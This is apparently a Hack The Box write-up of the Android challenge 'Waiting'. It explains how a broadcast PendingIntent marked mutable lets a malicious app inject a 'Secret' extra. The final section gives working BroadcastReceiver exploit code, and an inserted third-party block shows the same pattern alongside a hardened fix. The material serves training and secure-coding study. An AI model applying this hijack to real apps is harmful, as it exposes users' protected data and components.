Waiting

6th March 2023 / Document No. D23.102.108

Prepared By : aris

Challenge Author(s) : jQuerty

Difficulty : Medium

Classification : Official

Synopsis
This challenge is about the security of Android's Pending Intents. The vulnerable application
displays the secret (flag) through a Pending Intent that wraps an explicit intent (a good point from
a security standpoint) but has the MUTABLE flag set. The player has to find the security bug
through source code auditing, develop a malicious app able to exploit it and obtain the flag.

Description
The app stores a secret and says it is stored securely even in case the application. Are you able to
retrieve it?

Skills Required
Deep knowledge of Pending Intents in Android (a topic that is poorly documented, even in the most
famous Android security courses!).

How to leverage Pending Intents to get access to protected components/resources.

Basic reverse engineering skills.

Basic Android development skills.


Skills Learned
Learn more about exploiting mutable Pending Intents.

Learn how to develop custom APKs for automating the exploitation process.

Enumeration
The app is divided into three activities:

MainActivity: where the security bug resides. Whenever this activity goes into the background
(technically, when the onPause() method is called), a broadcast intent is sent to a receiver
configured to handle the com.example.waiting.RECEIVED action. This intent is broadcast every
5 seconds. It wraps a Pending Intent in the com.example.waiting.INTENT extra key, which in turn
wraps another intent destined for the MenuActivity (an explicit intent). Because the MUTABLE flag
is set on the Pending Intent, a malicious application can append or modify extra information in it.
The MenuActivity checks whether the intent it receives has the Secret extra key set to true in
order to display the secret (flag) to the end user. The goal of a malicious app is to add this extra
key so that the app displays the secret. Every time the app is launched, anti-patching,
anti-reverse-engineering-tool and anti-debugging mechanisms are activated to protect the app.

MenuActivity: a non-exported activity used to indicate that the secret is safe without revealing it.
Under the hood, this activity is also responsible for determining whether or not the app has been
tampered with.

SecretActivity: this activity displays the HTB flag. It leverages a JNI function from the native library
secrets.cpp (getdxXEPMNe()) to retrieve the flag, which is not hardcoded in the C++ code (see the
Secret Hiding section below for more details).

Anti-Tampering
Defense Measures

Code Obfuscation (Control-Flow Obfuscation for Java code)

Secret Hiding (in the native code)

Tampering Detection (with code obfuscated)

Anti-Debugging Detection (with code obfuscated)

Reverse Engineering Tools Detection

Code Obfuscation

The Java code is obfuscated except for the MainActivity, where the security bug is. The obfuscation was
done with dProtect (https://obfuscator.re/dprotect/), an Android bytecode obfuscator based on
ProGuard.
Secret Hiding

The plugin hidden-secrets-gradle-plugin was used to hide the string. It uses a combination of
obfuscation techniques to do so:

the secret is obfuscated using the reversible XOR operator, so it never appears in plain sight;

the obfuscated secret is stored in an NDK binary as a hexadecimal array, so it is really hard to spot /
put together from a disassembly;

the obfuscating string is not persisted in the binary, to force runtime evaluation (i.e. to prevent the
compiler from disclosing the secret by optimizing the de-obfuscation logic);

optionally, anyone can provide their own encoding / decoding algorithm when using the plugin to add
a security layer.

Tampering Detection & Anti-Debugging Detection

The anti-tampering checks are in place to steer the HTB user towards exploiting the vulnerability for which
this challenge was created: the challenge is designed so that the flag is obtained without tampering
with the app. The anti-tampering checks are:

CRC code of classes.dex: protection from code modification.

application signature: protection from resigning the app.

package name: checks on the package name.

debug mode: the app should not run in debug mode.

run on emulator: user must not run the app on an emulator.

Reverse Engineering Tools Detection

The native library lib-native.c checks for evidence of Frida. It has three ways to detect Frida hooking:

Detect through named pipes used by Frida

Detect through Frida-specific named threads

Compare text section in memory with text section in disk for both libc and native library

(see https://github.com/darvincisec/DetectFrida for more details)

Analyzing the source code


Let's first decompile the APK file. Opening up the MainActivity, we notice the creation of a Pending
Intent on the following line (33554432, i.e. 0x02000000, is the value of PendingIntent.FLAG_MUTABLE):

PendingIntent activity = PendingIntent.getActivity(this, 0, intent, 33554432);
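As an added example (not the challenge's or the author's code), the MainActivity pattern the write-up describes, reconstructed as an assumption, next to a hardened version of the same broadcast. The MenuActivity class, the action and the extra key come from the write-up; the method names are hypothetical.

```java
// Added example, not the Waiting app's own code. Reconstructs the vulnerable
// pattern described in the write-up and shows the hardened form beside it.
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;

public final class PendingIntentHardening {

    // Vulnerable (as described): 33554432 == 0x02000000 == PendingIntent.FLAG_MUTABLE.
    // Whoever receives the broadcast can call pi.send(ctx, 0, fillIn, null, null);
    // Intent.fillIn() merges extras that the wrapped intent lacks, so a missing
    // "Secret" extra can be supplied by the sender. The broadcast is also implicit,
    // so any app that registers a receiver for the action obtains the token.
    static void sendVulnerable(Context ctx) {
        Intent target = new Intent(ctx, MenuActivity.class); // explicit target (good)
        PendingIntent pi = PendingIntent.getActivity(ctx, 0, target, 33554432);
        Intent broadcast = new Intent("com.example.waiting.RECEIVED");
        broadcast.putExtra("com.example.waiting.INTENT", pi);
        ctx.sendBroadcast(broadcast);
    }

    // Hardened: FLAG_IMMUTABLE (API 23+) makes the fill-in intent passed to send()
    // ignored, so extras cannot be injected; restricting the broadcast to our own
    // package means no other app receives the token in the first place.
    static void sendHardened(Context ctx) {
        Intent target = new Intent(ctx, MenuActivity.class);
        PendingIntent pi = PendingIntent.getActivity(
                ctx, 0, target, PendingIntent.FLAG_IMMUTABLE);
        Intent broadcast = new Intent("com.example.waiting.RECEIVED");
        broadcast.setPackage(ctx.getPackageName()); // delivered only to our receivers
        broadcast.putExtra("com.example.waiting.INTENT", pi);
        ctx.sendBroadcast(broadcast);
    }
}
```

Defense in depth: the receiving activity should not treat a boolean extra as an authorization decision, since an extra is attacker-controlled whenever the token is mutable or reaches another app.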

Viewing the MenuActivity we analyze the following piece of code to understand how the
SecretActivity will be launched. Every time the MenuActivity is created, it checks if the intent received
has the Secret extra key set to true:
public void onCreate(Bundle bundle) {
    super.onCreate(bundle);
    setContentView(R.layout.activity_menu);
    do {
        try {
            System.out.println(Long.toString(a.a(this.j)));
        } catch (IOException e) {
            e.printStackTrace();
        }
    } while ((k + 1) % 2 == 0);
    if (getIntent().getBooleanExtra("Secret", false)) {
        try {
            k();
            Intent intent = new Intent(this, SecretActivity.class);
            do {
                startActivity(intent);
            } while ((k + 1) % 2 == 0);
        } catch (a.C0031a | IOException unused) {
            Toast.makeText(this.j, "App Tampered!!", 0).show();
            ((TextView) findViewById(R.id.text_menu)).setText(R.string.tampered);
            ((TextView) findViewById(R.id.text_menu_closing)).setText(R.string.tampered_closing);
            new Handler().postDelayed(new Runnable() { // from class: com.example.waiting.MenuActivity.1
                @Override // java.lang.Runnable
                public void run() {
                    MenuActivity.this.finishAndRemoveTask();
                    System.exit(0);
                }
            }, 10000L);
        }
    }
}

Analyzing the Smali code


If the decompiler is not able to decompile the code properly, we should analyze the Smali code
of the MenuActivity and spot the instruction where the Secret extra key is verified (if the user patches
the app, it will not display the secret, thanks to the anti-tampering checks!). Once the value is checked,
the SecretActivity is launched:
L2d:
    android.content.Intent r0 = r4.getIntent()
    java.lang.String r1 = "Secret"
    boolean r0 = r0.getBooleanExtra(r1, r5)
    if (r0 == 0) goto L8e
L39:
    r4.k()    // Catch: java.lang.Throwable -> L56
    android.content.Intent r0 = new android.content.Intent    // Catch: java.lang.Throwable -> L56
    java.lang.Class<com.example.waiting.SecretActivity> r1 = com.example.waiting.SecretActivity.class
    r0.<init>(r4, r1)    // Catch: java.lang.Throwable -> L56
L43:
    r4.startActivity(r0)    // Catch: java.lang.Throwable -> L56

Once the code is understood, it's time to develop a malicious application. We should perform the following
steps:

First, we should define, create and register a Broadcast Receiver in the evil app (similar to the code
shown below in the Getting the Flag section).

Install the evil app on the device/emulator.

Open the Waiting app and do not click on the Menu button.

Send the app in background.

Open the evil app and wait. The SecretActivity will appear with the secret flag displayed.

Getting the Flag


The Solver.apk is provided in the htb folder. The following is an example of a BroadcastReceiver needed
to exploit the vulnerability and resolve the challenge.

package com.example.evilapp;

import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Handler;

public class MyReceiver extends BroadcastReceiver {

    @Override
    public void onReceive(Context context, Intent intent) {
        // The Waiting app broadcasts its (mutable) PendingIntent in this extra.
        PendingIntent fromOtherApp =
                (PendingIntent) intent.getParcelableExtra("com.example.waiting.INTENT");
        System.out.println("Intent Received!");
        if (fromOtherApp != null) {
            Runnable theTimeHasCome = new Runnable() {
                @Override
                public void run() {
                    try {
                        System.out.println("Broadcast activated");
                        //fromOtherApp.send();
                        // Because the token is mutable, the extras of this fill-in intent
                        // are merged into the wrapped intent before MenuActivity starts.
                        Intent hijackIntent = new Intent();
                        hijackIntent.putExtra("Secret", true);
                        fromOtherApp.send(context.getApplicationContext(), 0, hijackIntent,
                                null, null);
                        System.out.println("Pending Intent sent");
                    } catch (PendingIntent.CanceledException e) {
                        e.printStackTrace();
                    }
                }
            };
            (new Handler()).postDelayed(theTimeHasCome, 2000);
        } else {
            System.out.println("you shouldn't come here");
        }
    }
}
